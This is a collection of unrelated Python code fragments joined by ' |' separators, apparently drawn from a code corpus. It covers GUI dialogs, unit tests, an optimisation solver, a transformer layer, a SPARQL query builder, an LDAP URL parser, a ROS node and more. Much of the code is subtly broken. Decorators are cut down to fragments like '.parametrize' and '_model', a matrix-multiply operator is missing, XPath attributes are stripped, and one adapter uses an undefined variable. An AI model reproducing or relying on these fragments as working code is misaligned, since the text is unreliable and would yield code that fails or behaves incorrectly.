file_dialog.selectNameFilter(default_filter)
if (file_dialog.exec() != QDialog.Accepted):
return None
selected_path = file_dialog.selectedFiles()[0]
if (selected_path and (directory != os.path.dirname(selected_path))):
config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path |
class TestText(unittest.TestCase):
def setUp(self):
self.text_mock = mock.Mock()
def test_setting_text(self):
Text._set_text(self.text_mock, 'foo')
self.assertEqual(self.text_mock.text, 'foo')
def test_setting_color_with_color_provided(self):
Text._set_color(self.text_mock, '#000')
self.assertEqual(self.text_mock.color, (0, 0, 0))
def test_setting_color_without_color(self):
Text._set_color(self.text_mock, None)
self.assertIsNone(self.text_mock.color)
def test_initialization(self):
outline = Outline(2, '#111')
text = Text('foo', Font(), '#000', outline)
self.assertEqual(text.text, 'foo')
self.assertIsNotNone(text.font)
self.assertEqual(text.color, (0, 0, 0))
self.assertEqual(text.outline, outline) |
class _ImageCollection(pystiche.ComplexObject):
def __init__(self, images: Mapping[(str, _Image)]) -> None:
self._images = images
def __len__(self) -> int:
return len(self._images)
def __getitem__(self, name: str) -> _Image:
return self._images[name]
def __iter__(self) -> Iterator[Tuple[(str, _Image)]]:
for (name, image) in self._images.items():
(yield (name, image))
def __contains__(self, name: str) -> bool:
return (name in self._images)
def read(self, root: Optional[str]=None, **read_image_kwargs: Any) -> Dict[(str, torch.Tensor)]:
return {name: image.read(root=root, **read_image_kwargs) for (name, image) in self}
def _named_children(self) -> Iterator[Tuple[(str, Any)]]:
(yield from iter(self._images.items())) |
def test_gmail_checker_invalid_response(fake_qtile, monkeypatch, fake_window):
monkeypatch.setitem(sys.modules, 'imaplib', FakeIMAP('imaplib'))
reload(gmail_checker)
gmc = gmail_checker.GmailChecker()
fakebar = FakeBar([gmc], window=fake_window)
gmc._configure(fake_qtile, fakebar)
text = gmc.poll()
assert (text == 'UNKNOWN ERROR') |
def setup_custom_environment(custom_module_path):
module = import_file('maskrcnn_benchmark.utils.env.custom_module', custom_module_path)
assert (hasattr(module, 'setup_environment') and callable(module.setup_environment)), "Custom environment module defined in {} does not have the required callable attribute 'setup_environment'.".format(custom_module_path)
module.setup_environment() |
class MCLP(LocateSolver, BaseOutputMixin, CoveragePercentageMixin):
def __init__(self, name: str, problem: pulp.LpProblem):
super().__init__(name, problem)
def __add_obj(self, weights: np.array, range_clients: range) -> None:
dem_vars = getattr(self, 'cli_vars')
self.problem += (pulp.lpSum([(weights.flatten()[i] * dem_vars[i]) for i in range_clients]), 'objective function')
def from_cost_matrix(cls, cost_matrix: np.array, weights: np.array, service_radius: float, p_facilities: int, predefined_facilities_arr: np.array=None, name: str='mclp'):
n_cli = cost_matrix.shape[0]
r_cli = range(n_cli)
r_fac = range(cost_matrix.shape[1])
model = pulp.LpProblem(name, pulp.LpMaximize)
mclp = MCLP(name, model)
FacilityModelBuilder.add_facility_integer_variable(mclp, r_fac, 'x[{i}]')
FacilityModelBuilder.add_client_integer_variable(mclp, r_cli, 'y[{i}]')
mclp.aij = np.zeros(cost_matrix.shape)
mclp.aij[(cost_matrix <= service_radius)] = 1
weights = np.reshape(weights, (n_cli, 1))
mclp.__add_obj(weights, r_cli)
if (predefined_facilities_arr is not None):
FacilityModelBuilder.add_predefined_facility_constraint(mclp, predefined_facilities_arr)
FacilityModelBuilder.add_maximal_coverage_constraint(mclp, r_fac, r_cli)
FacilityModelBuilder.add_facility_constraint(mclp, p_facilities)
return mclp
def from_geodataframe(cls, gdf_demand: GeoDataFrame, gdf_fac: GeoDataFrame, demand_col: str, facility_col: str, weights_cols: str, service_radius: float, p_facilities: int, predefined_facility_col: str=None, distance_metric: str='euclidean', name: str='mclp'):
predefined_facilities_arr = None
if (predefined_facility_col is not None):
predefined_facilities_arr = gdf_fac[predefined_facility_col].to_numpy()
service_load = gdf_demand[weights_cols].to_numpy()
dem = gdf_demand[demand_col]
fac = gdf_fac[facility_col]
dem_type_geom = dem.geom_type.unique()
fac_type_geom = fac.geom_type.unique()
_msg = " geodataframe contains mixed type geometries or is not a point. Be sure deriving centroid from geometries doesn't affect the results."
if ((len(dem_type_geom) > 1) or ('Point' not in dem_type_geom)):
warnings.warn(f'Demand{_msg}', UserWarning, stacklevel=2)
dem = dem.centroid
if ((len(fac_type_geom) > 1) or ('Point' not in fac_type_geom)):
warnings.warn(f'Facility{_msg}', UserWarning, stacklevel=2)
fac = fac.centroid
dem_data = np.array([dem.x.to_numpy(), dem.y.to_numpy()]).T
fac_data = np.array([fac.x.to_numpy(), fac.y.to_numpy()]).T
if (gdf_demand.crs != gdf_fac.crs):
raise ValueError(f'Geodataframes crs are different: gdf_demand-{gdf_demand.crs}, gdf_fac-{gdf_fac.crs}')
distances = cdist(dem_data, fac_data, distance_metric)
return cls.from_cost_matrix(distances, service_load, service_radius, p_facilities, predefined_facilities_arr, name)
def facility_client_array(self) -> None:
fac_vars = getattr(self, 'fac_vars')
cli_vars = getattr(self, 'cli_vars')
len_fac_vars = len(fac_vars)
self.fac2cli = []
for j in range(len_fac_vars):
array_cli = []
if (fac_vars[j].value() > 0):
for i in range(self.aij.shape[0]):
if ((cli_vars[i].value() > 0) and (self.aij[(i, j)] > 0)):
array_cli.append(i)
self.fac2cli.append(array_cli)
def solve(self, solver: pulp.LpSolver, results: bool=True):
self.problem.solve(solver)
self.check_status()
if results:
self.facility_client_array()
self.client_facility_array()
self.uncovered_clients()
self.get_percentage()
return self |
class TransformerEncoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation='relu', normalize_before=False, norm=True, no_ffn=False, no_encoder_self_att=False):
super().__init__()
self.no_ffn = no_ffn
self.no_encoder_self_att = no_encoder_self_att
if (not self.no_encoder_self_att):
self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
if (not self.no_ffn):
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.dropout = nn.Dropout(dropout)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = (nn.LayerNorm(d_model) if norm else nn.Identity())
self.norm2 = (nn.LayerNorm(d_model) if norm else nn.Identity())
self.dropout1 = nn.Dropout(dropout)
self.dropout2 = nn.Dropout(dropout)
self.activation = _get_activation_fn(activation)
self.normalize_before = normalize_before
def with_pos_embed(self, tensor, pos: Optional[Tensor]):
return (tensor if (pos is None) else (tensor + pos))
def forward_post(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
q = k = self.with_pos_embed(src, pos)
if (not self.no_encoder_self_att):
src2 = self.self_attn(q, k, value=src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)[0]
if self.no_ffn:
return (src + src2)
src = (src + self.dropout1(src2))
src = self.norm1(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = (src + self.dropout2(src2))
src = self.norm2(src)
return src
def forward_pre(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
src2 = self.norm1(src)
q = k = self.with_pos_embed(src2, pos)
src2 = self.self_attn(q, k, value=src2, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)[0]
if self.no_ffn:
return (src + src2)
src = (src + self.dropout1(src2))
src2 = self.norm2(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src2))))
src = (src + self.dropout2(src2))
return src
def forward(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
if self.normalize_before:
return self.forward_pre(src, src_mask, src_key_padding_mask, pos)
return self.forward_post(src, src_mask, src_key_padding_mask, pos) |
class QueryCreator():
def __init__(self, strict_mode=False):
self.namer = VariableNamer()
self.creator_for_op_name = {}
self.creator_for_op_name['aggregate'] = QueryStepAggregate
self.creator_for_op_name['select'] = QueryStepSelect
self.creator_for_op_name['project'] = QueryStepProject
self.creator_for_op_name['union'] = QueryStepUnion
self.creator_for_op_name['intersection'] = QueryStepIntersection
self.creator_for_op_name['sort'] = QueryStepSort
self.creator_for_op_name['comparative'] = QueryStepComparative
self.creator_for_op_name['superlative'] = QueryStepSuperlative
self.creator_for_op_name['group'] = QueryStepGroup
self.creator_for_op_name['discard'] = QueryStepDiscard
self.creator_for_op_name['arithmetic'] = QueryStepArithmetic
self.strict_mode = strict_mode
def build_sparql_query(self, qdmr, schema, rdf_graph, grounding):
qdmr = copy.deepcopy(qdmr)
grounding = copy.deepcopy(grounding)
schema = copy.deepcopy(schema)
self.cleanup_qdmr(qdmr, grounding)
self.parse_distinct_grounding(grounding, len(qdmr))
for (op, args) in qdmr:
assert (op in self.creator_for_op_name), f'Could not find a method for the QDMR op {op}'
self.grounding_for_qdmr_index = self.build_grounding_qdmr_steps_before_execution(qdmr, grounding)
self.qdmr = qdmr
self.schema = SchemaWithRdfGraph(schema, rdf_graph)
self.grounding = grounding
qdmr_index = (len(qdmr) - 1)
context = self.construct_set_of_args([qdmr_index], inline_query=False)
query = QueryToRdf(query=context.query, output_cols=[u.output_col for u in context.output_units_for_qdmr_index[qdmr_index]], sorting_info=context.sorting_info)
for (i_op, (op, args)) in enumerate(qdmr):
if (op == 'superlative'):
query.query_has_superlative = True
if (op == 'comparative'):
grnd_ind = GroundingIndex(i_op, 2, args[2])
if (grounding.get(grnd_ind) and grounding[grnd_ind].iscomp()):
grnd = grounding[grnd_ind]
if ((grnd.keys[0] == '=') and (len(grnd.keys) > 1) and QdmrInstance.is_good_qdmr_ref(grnd.keys[1])):
ref_ind = QdmrInstance.ref_to_index(grnd.keys[1])
(ref_op, ref_args) = qdmr[ref_ind]
if ((ref_op == 'aggregate') and (ref_args[0].lower() in ['min', 'max'])):
query.query_has_superlative = True
return query
def construct_set_of_args(self, qdmr_target_indices, inline_query, context=None):
if (context is None):
context = LocalContext()
op_list = [self.qdmr.ops[i] for i in qdmr_target_indices]
if ('group' in op_list):
non_group_pos = 0
qdmr_target_indices = copy.deepcopy(qdmr_target_indices)
while ('group' in op_list[non_group_pos:]):
i_group = op_list.index('group', non_group_pos)
op_list = (((op_list[:non_group_pos] + [op_list[i_group]]) + op_list[non_group_pos:i_group]) + op_list[(i_group + 1):])
qdmr_target_indices = (((qdmr_target_indices[:non_group_pos] + [qdmr_target_indices[i_group]]) + qdmr_target_indices[non_group_pos:i_group]) + qdmr_target_indices[(i_group + 1):])
non_group_pos += 1
num_loops = 0
max_num_loops = 10
while ((not all(((index in context.output_units_for_qdmr_index) for index in qdmr_target_indices))) and (num_loops < max_num_loops)):
for index in qdmr_target_indices:
if (index not in context.output_units_for_qdmr_index):
op = self.creator_for_op_name[self.qdmr.ops[index]](self)
context = op.build_step(index, inline_query=inline_query, context=context)
num_loops += 1
assert (num_loops < max_num_loops), f'Cound not compute target indices {qdmr_target_indices}, got this: {context.output_units_for_qdmr_index}'
return context
def build_grounding_qdmr_steps_before_execution(cls, qdmr, grounding):
grounding_for_qdmr_index = {}
for (qdmr_index, (op, args)) in enumerate(qdmr):
op = op.lower()
if (op in ['select']):
i_arg = 0
grnd = [grounding[GroundingIndex(qdmr_index, i_arg, args[i_arg])]]
elif (op in ['project']):
i_arg = 0
index = GroundingIndex(qdmr_index, i_arg, args[i_arg])
if (index in grounding):
grnd = [grounding[index]]
else:
i_arg = 1
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = grounding_for_qdmr_index[source_index]
elif (op in ['comparative', 'superlative', 'intersection', 'discard', 'sort']):
i_arg = (0 if (op not in ['superlative']) else 1)
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = grounding_for_qdmr_index[source_index]
elif (op in ['aggregate', 'group']):
i_arg = 1
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = [None for s in grounding_for_qdmr_index[source_index]]
elif (op in ['union']):
source_indices = [QdmrInstance.ref_to_index(arg, qdmr_index) for arg in args]
source_grnds = [tuple(grounding_for_qdmr_index[i_]) for i_ in source_indices]
aggregate_in_args = [(qdmr.ops[i] == 'aggregate') for i in source_indices]
if all(aggregate_in_args):
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
elif any(((qdmr.ops[i] == 'group') for i in source_indices)):
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
else:
is_vertical_union = all(((source_grnds[0] == g) for g in source_grnds[1:]))
if is_vertical_union:
grnd = grounding_for_qdmr_index[source_indices[0]]
else:
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
elif (op in ['arithmetic']):
grnd = [None]
else:
raise RuntimeError(f'Have not implemented static grounding for op {op} in {qdmr}, {grounding}')
grounding_for_qdmr_index[qdmr_index] = grnd
return grounding_for_qdmr_index
def parse_distinct_grounding(cls, out_grounding, num_ops=None):
if ('distinct' in out_grounding):
out_grounding['distinct'] = [QdmrInstance.ref_to_index(ref, max_index=num_ops) for ref in out_grounding['distinct']]
else:
out_grounding['distinct'] = []
def cleanup_qdmr(cls, out_qdmr, out_grounding):
for i_op in range(len(out_qdmr)):
cls.qdmr_cleanup_change_comparative_to_superlative(i_op, out_qdmr, out_grounding)
cls.qdmr_cleanup_grounded_aggregator(i_op, out_qdmr, out_grounding)
cls.qdmr_cleanup_change_filter_to_comparative(i_op, out_qdmr, out_grounding)
def qdmr_cleanup_change_comparative_to_superlative(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() == 'comparative'):
grnd_key_src = GroundingIndex(i_op, 2, args[2])
grnd = out_grounding.get(grnd_key_src)
if (grnd and grnd.iscomp() and (grnd.keys[0].lower() in ['min', 'max'])):
out_qdmr.ops[i_op] = 'superlative'
assert (len(args) == 3), f'COMPARATIVE should have 3 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[2], args[0], args[1]]
grnd_key_target = GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src)
elif (op.lower() == 'filter'):
grnd_key_src = GroundingIndex(i_op, 1, args[1])
grnd = out_grounding.get(grnd_key_src)
if (grnd and grnd.iscomp() and (grnd.keys[0].lower() in ['min', 'max'])):
out_qdmr.ops[i_op] = 'superlative'
assert (len(args) == 2), f'FILTER should have 2 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[1], args[0], args[0]]
grnd_key_target = GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src)
def qdmr_cleanup_grounded_aggregator(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() in ['group', 'aggregate']):
grnd_index = GroundingIndex(i_op, 0, args[0])
if ((grnd_index in out_grounding) and out_grounding[grnd_index]):
out_qdmr.ops[i_op] = 'project'
if (op.lower() == 'group'):
assert (len(args) == 3), f'GROUP should have 3 args but have {len(args)}: {args}'
i_arg_target = 2
elif (op.lower() == 'aggregate'):
assert (len(args) == 2), f'AGGREGATE should have 2 args but have {len(args)}: {args}'
i_arg_target = 1
else:
raise RuntimeError(f"Unknown op '{op}'")
out_qdmr.args[i_op] = [str(grnd_index), args[i_arg_target]]
out_grounding[GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])] = out_grounding[grnd_index]
del out_grounding[grnd_index]
def qdmr_cleanup_change_filter_to_comparative(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() == 'filter'):
grnd_key_src = GroundingIndex(i_op, 1, args[1])
out_qdmr.ops[i_op] = 'comparative'
assert (len(args) == 2), f'FILTER should have 2 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[0], args[0], args[1]]
grnd_key_target = GroundingIndex(i_op, 2, out_qdmr.args[i_op][2])
if (grnd_key_src in out_grounding):
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src) |
.parametrize('func', [(lambda x: x.sum()), (lambda x: x.count()), (lambda x: x.apply((lambda x: x))), (lambda x: x.full()), (lambda x: x.var()), (lambda x: x.std())], ids=['sum', 'count', 'apply', 'full', 'var', 'std'])
def test_ewm_notimplemented(func):
sdf = DataFrame(example=pd.DataFrame(columns=['x', 'y']))
with pytest.raises(NotImplementedError):
func(sdf.ewm(1)) |
def pylsp_lint(workspace: Workspace, document: Document) -> List[Dict]:
settings = load_settings(workspace, document.path)
checks = run_ruff_check(document=document, settings=settings)
diagnostics = [create_diagnostic(check=c, settings=settings) for c in checks]
return converter.unstructure(diagnostics) |
def decode_header(trf_header_contents: bytes) -> Header:
match = _header_match(trf_header_contents)
groups = match.groups()
date = groups[0].decode('utf-8')
timezone = groups[1].decode('utf-8')
field = groups[2].decode('utf-8')
machine = groups[3].decode('utf-8')
mu = np.frombuffer(groups[4][0:8], dtype=np.float64).item()
version = np.frombuffer(groups[4][8:12], dtype=np.int32).item()
item_parts_number = np.frombuffer(groups[4][12:16], dtype=np.int32).item()
item_parts = np.frombuffer(groups[4][16:(16 + (4 * item_parts_number))], dtype=np.int16)
item_parts_length = int(len(item_parts))
split_field = field.split('/')
if (len(split_field) == 2):
(field_label, field_name) = split_field
else:
(field_label, field_name) = ('', field)
header = Header(machine, date, timezone, field_label, field_name, mu, version, item_parts_number, item_parts_length, item_parts)
return header |
class CalcChangeFitSystemSecurityCommand(wx.Command):
def __init__(self, fitID, secStatus):
wx.Command.__init__(self, True, 'Change Fit System Security')
self.fitID = fitID
self.secStatus = secStatus
self.savedSecStatus = None
def Do(self):
pyfalog.debug('Doing changing system security status of fit {} to {}'.format(self.fitID, self.secStatus))
fit = Fit.getInstance().getFit(self.fitID, basic=True)
if (fit.getSystemSecurity() == self.secStatus):
return False
self.savedSecStatus = fit.systemSecurity
fit.systemSecurity = self.secStatus
return True
def Undo(self):
pyfalog.debug('Undoing changing system security status of fit {} to {}'.format(self.fitID, self.secStatus))
cmd = CalcChangeFitSystemSecurityCommand(fitID=self.fitID, secStatus=self.savedSecStatus)
return cmd.Do() |
class TestSharedoc(ZiplineTestCase):
def test_copydoc(self):
def original_docstring_function():
pass
(original_docstring_function)
def copied_docstring_function():
pass
self.assertEqual(original_docstring_function.__doc__, copied_docstring_function.__doc__) |
def add_shared_install_options(parser: argparse.ArgumentParser):
parser.add_argument('--user', action='store_true', default=None, help='Do a user-local install (default if site.ENABLE_USER_SITE is True)')
parser.add_argument('--env', action='store_false', dest='user', help='Install into sys.prefix (default if site.ENABLE_USER_SITE is False, i.e. in virtualenvs)')
parser.add_argument('--python', help='Target Python executable, if different from the one running flit')
parser.add_argument('--deps', choices=['all', 'production', 'develop', 'none'], default='all', help='Which set of dependencies to install. If --deps=develop, the extras dev, doc, and test are installed')
parser.add_argument('--only-deps', action='store_true', help='Install only dependencies of this package, and not the package itself')
parser.add_argument('--extras', default=(), type=(lambda l: (l.split(',') if l else ())), help='Install the dependencies of these (comma separated) extras additionally to the ones implied by --deps. --extras=all can be useful in combination with --deps=production, --deps=none precludes using --extras') |
class TestDrivenMilesCompositeMetric(unittest.TestCase):
def test_zero_miles(self) -> None:
metric_results: Dict[(str, torch.Tensor)] = {metrics.SimulatedDrivenMilesMetric.metric_name: torch.zeros(10)}
simulation_output = mock.Mock()
validation_results = mock.Mock()
dm_metric = cm.DrivenMilesCompositeMetric('total_driven_miles')
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, 0.0)
def test_driven_miles(self) -> None:
driven_tensor_ones = torch.ones(10)
metric_results: Dict[(str, torch.Tensor)] = {metrics.SimulatedDrivenMilesMetric.metric_name: driven_tensor_ones}
simulation_output = mock.Mock()
validation_results = mock.Mock()
dm_metric = cm.DrivenMilesCompositeMetric('total_driven_miles')
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, driven_tensor_ones.sum())
driven_tensor_monotonic = torch.arange(10)
metric_results[metrics.SimulatedDrivenMilesMetric.metric_name] = driven_tensor_monotonic
simulation_output.reset_mock()
validation_results.reset_mock()
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, driven_tensor_monotonic.sum()) |
class DebugInfoCommand(Command):
name = 'debug info'
description = 'Shows debug information.'
def handle(self) -> int:
poetry_python_version = '.'.join((str(s) for s in sys.version_info[:3]))
self.line('')
self.line('<b>Poetry</b>')
self.line('\n'.join([f'<info>Version</info>: <comment>{self.poetry.VERSION}</>', f'<info>Python</info>: <comment>{poetry_python_version}</>']))
command = self.get_application().get('env info')
exit_code: int = command.run(self.io)
return exit_code |
.parametrize('when', ['setup', 'call', 'teardown'])
def test_crashing_item(pytester, when) -> None:
code = dict(setup='', call='', teardown='')
code[when] = 'os._exit(1)'
p = pytester.makepyfile('\n import os\n import pytest\n\n \n def fix():\n {setup}\n yield\n {teardown}\n\n def test_crash(fix):\n {call}\n pass\n\n def test_ok():\n pass\n '.format(**code))
passes = (2 if (when == 'teardown') else 1)
result = pytester.runpytest('-n2', p)
result.stdout.fnmatch_lines(['*crashed*test_crash*', ('*1 failed*%d passed*' % passes)]) |
def get_user_field(question: str, default_value: Optional[str]=None, is_valid_answer: Optional[Callable]=None, convert_to: Optional[Callable]=None, fallback_message: Optional[str]=None) -> Any:
if (not question.endswith(' ')):
question = (question + ' ')
if (default_value is not None):
question = f'{question} [{default_value}] '
valid_answer = False
while (not valid_answer):
answer = input(question)
if ((default_value is not None) and (len(answer) == 0)):
answer = default_value
if (is_valid_answer is not None):
valid_answer = is_valid_answer(answer)
elif (convert_to is not None):
try:
answer = convert_to(answer)
valid_answer = True
except Exception:
valid_answer = False
else:
valid_answer = True
if (not valid_answer):
print(fallback_message)
return answer |
_fixtures(WebFixture)
def test_distinguishing_identical_field_names(web_fixture):
fixture = web_fixture
class ModelObject():
fields = ExposedNames()
fields.field_name = (lambda i: IntegerField())
model_object1 = ModelObject()
model_object2 = ModelObject()
class MyForm(Form):
events = ExposedNames()
events.an_event = (lambda i: Event(label='click me'))
def __init__(self, view, name):
super().__init__(view, name)
self.define_event_handler(self.events.an_event)
self.add_child(ButtonInput(self, self.events.an_event))
self.add_child(TextInput(self, model_object1.fields.field_name))
self.add_child(TextInput(self, model_object2.fields.field_name.with_discriminator('object2')))
wsgi_app = fixture.new_wsgi_app(child_factory=MyForm.factory('form'))
fixture.reahl_server.set_app(wsgi_app)
fixture.driver_browser.open('/')
fixture.driver_browser.type('//input[="text"][1]', '0')
fixture.driver_browser.type('//input[="text"][2]', '1')
fixture.driver_browser.click(XPath.button_labelled('click me'))
assert (model_object1.field_name == 0)
assert (model_object2.field_name == 1) |
_model
def caformer_m36_in21ft1k(pretrained=False, **kwargs):
model = MetaFormer(depths=[3, 12, 18, 3], dims=[96, 192, 384, 576], token_mixers=[SepConv, SepConv, Attention, Attention], head_fn=MlpHead, **kwargs)
model.default_cfg = default_cfgs['caformer_m36_in21ft1k']
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(url=model.default_cfg['url'], map_location='cpu', check_hash=True)
model.load_state_dict(state_dict)
return model |
class LDAPUrlExtension():
def __init__(self, extensionStr=None, critical=0, extype=None, exvalue=None):
self.critical = critical
self.extype = extype
self.exvalue = exvalue
if extensionStr:
self._parse(extensionStr)
def _parse(self, extension):
extension = extension.strip()
if (not extension):
(self.extype, self.exvalue) = (None, None)
return
self.critical = (extension[0] == '!')
if (extension[0] == '!'):
extension = extension[1:].strip()
try:
(self.extype, self.exvalue) = extension.split('=', 1)
except ValueError:
(self.extype, self.exvalue) = (extension, None)
else:
self.exvalue = unquote(self.exvalue.strip())
self.extype = self.extype.strip()
def unparse(self):
if (self.exvalue is None):
return '{}{}'.format(('!' * (self.critical > 0)), self.extype)
else:
return '{}{}={}'.format(('!' * (self.critical > 0)), self.extype, quote((self.exvalue or '')))
def __str__(self):
return self.unparse()
def __repr__(self):
return '<{}.{} instance at {}: {}>'.format(self.__class__.__module__, self.__class__.__name__, hex(id(self)), self.__dict__)
def __eq__(self, other):
return ((self.critical == other.critical) and (self.extype == other.extype) and (self.exvalue == other.exvalue))
def __ne__(self, other):
return (not self.__eq__(other)) |
def makeCfdMeshImported(name='ImportedCFDMesh'):
doc = FreeCAD.ActiveDocument
obj = doc.addObject('Fem::FemMeshObjectPython', name)
_CaeMeshImported._CaeMeshImported(obj)
if FreeCAD.GuiUp:
from cfdguiobjects._ViewProviderCaeMesh import _ViewProviderCaeMesh
_ViewProviderCaeMesh(obj.ViewObject)
return obj |
class MemIfcRTL2FLAdapter(Component):
def construct(s, ReqType, RespType):
s.left = MemMinionIfcRTL(ReqType, RespType)
s.right = MemMasterIfcFL()
_once
def up_memifc_rtl_fl_blk():
if (s.left.req.en and s.left.resp.rdy):
if (s.left.req.msg.type_ == MemMsgType.READ):
resp = RespType(s.left.req.msg.type_, s.right.read(s.left.req.msg.addr))
elif (s.left.req.msg.type_ == MemMsgType.WRITE):
s.right.write(s.left.req.msg.addr, s.left.req.msg.data)
resp = RespType(s.left.req.msg.type_, 0)
else:
resp = RespType(req.type_, req.opaque, 0, req.len, s.right.amo(req.type_, req.addr, len_, req.data))
s.left.resp.en = Bits1(1)
s.left.resp.msg = resp
def up_memifc_rtl_fl_rdy():
s.left.req.rdy = s.left.resp.rdy |
def on_draw():
window.clear()
glLoadIdentity()
glLightfv(GL_LIGHT0, GL_POSITION, lightfv((- 40.0), 200.0, 100.0, 0.0))
glLightfv(GL_LIGHT0, GL_AMBIENT, lightfv(0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightfv(0.5, 0.5, 0.5, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH)
glMatrixMode(GL_MODELVIEW)
glTranslated(0, 0.8, (- 20))
glRotatef((- 66.5), 0, 0, 1)
glRotatef(rotation, 1, 0, 0)
glRotatef(90, 0, 0, 1)
glRotatef(0, 0, 1, 0)
visualization.draw(meshes) |
class ObjectMapping():
_models = morefusion.datasets.YCBVideoModels()
def __init__(self):
self.reset()
self._n_votes = rospy.get_param('~n_votes', 3)
self._base_frame = rospy.get_param('~frame_id', 'map')
self._pub = rospy.Publisher('~output/poses', ObjectPoseArray, queue_size=1, latch=True)
self._pub_grids = rospy.Publisher('~output/grids', VoxelGridArray, queue_size=1, latch=True)
self._tf_listener = tf.TransformListener(cache_time=rospy.Duration(30))
self._sub = rospy.Subscriber('~input/poses', ObjectPoseArray, self._callback, queue_size=1)
self._sub_grids = rospy.Subscriber('~input/grids', VoxelGridArray, self._callback_grids, queue_size=1)
self._sub_remove = rospy.Subscriber('~input/remove', ObjectClassArray, self._callback_remove, queue_size=1)
self._srv_reset = rospy.Service('~reset', Empty, self._callback_reset)
self._lock = threading.Lock()
def reset(self):
self._objects = {}
self._instance_ids_removed = set()
self._reset_stamp = rospy.Time.now()
def _callback_reset(self, req):
self._lock.acquire()
self.reset()
self._pub.publish(ObjectPoseArray())
self._pub_grids.publish(VoxelGridArray())
self._lock.release()
return EmptyResponse()
def _callback_grids(self, grids_msg):
if (grids_msg.header.stamp < self._reset_stamp):
return
self._lock.acquire()
out_msg = copy.deepcopy(grids_msg)
out_msg.grids = []
for grid in grids_msg.grids:
if ((grid.instance_id in self._objects) and self._objects[grid.instance_id].is_spawned):
continue
out_msg.grids.append(grid)
self._pub_grids.publish(out_msg)
self._lock.release()
def _callback_remove(self, cls_msg):
if (cls_msg.header.stamp < self._reset_stamp):
return
for cls in cls_msg.classes:
self._instance_ids_removed.add(cls.instance_id)
self._publish_poses(cls_msg.header.stamp)
def _publish_poses(self, stamp):
out_msg = ObjectPoseArray()
out_msg.header.stamp = stamp
out_msg.header.frame_id = self._base_frame
for (ins_id, obj) in self._objects.items():
if (ins_id in self._instance_ids_removed):
continue
if (not obj.validate()):
continue
pose = ObjectPose(instance_id=ins_id, class_id=obj.class_id)
T_cad2base = obj.pose
translation = ttf.translation_from_matrix(T_cad2base)
quaternion = ttf.quaternion_from_matrix(T_cad2base)
pose.pose.position.x = translation[0]
pose.pose.position.y = translation[1]
pose.pose.position.z = translation[2]
pose.pose.orientation.w = quaternion[0]
pose.pose.orientation.x = quaternion[1]
pose.pose.orientation.y = quaternion[2]
pose.pose.orientation.z = quaternion[3]
out_msg.poses.append(pose)
self._pub.publish(out_msg)
def _callback(self, poses_msg):
if (poses_msg.header.stamp < self._reset_stamp):
return
try:
self._tf_listener.waitForTransform(target_frame=self._base_frame, source_frame=poses_msg.header.frame_id, time=poses_msg.header.stamp, timeout=rospy.Duration(0.1))
except Exception as e:
rospy.logerr(e)
return
(translation, quaternion) = self._tf_listener.lookupTransform(target_frame=self._base_frame, source_frame=poses_msg.header.frame_id, time=poses_msg.header.stamp)
translation = np.asarray(translation)
quaternion = np.asarray(quaternion)[[3, 0, 1, 2]]
T_cam2base = morefusion.functions.transformation_matrix(quaternion, translation).array
self._lock.acquire()
for pose in poses_msg.poses:
instance_id = pose.instance_id
class_id = pose.class_id
(quaternion, translation) = morefusion.ros.from_ros_pose(pose.pose)
T_cad2cam = morefusion.functions.transformation_matrix(quaternion, translation).array
T_cad2base = (T_cam2base T_cad2cam)
if (instance_id in self._objects):
self._objects[instance_id].append_pose(T_cad2base)
else:
self._objects[instance_id] = Object(class_id=class_id, pcd=self._models.get_pcd(class_id), is_symmetric=(class_id in morefusion.datasets.ycb_video.class_ids_symmetric), n_votes=self._n_votes)
self._objects[instance_id].append_pose(T_cad2base)
self._publish_poses(stamp=poses_msg.header.stamp)
self._lock.release() |
class StructureMixIn(object):
def __str__(self):
lines = []
for (field_name, _) in getattr(self, '_fields_', []):
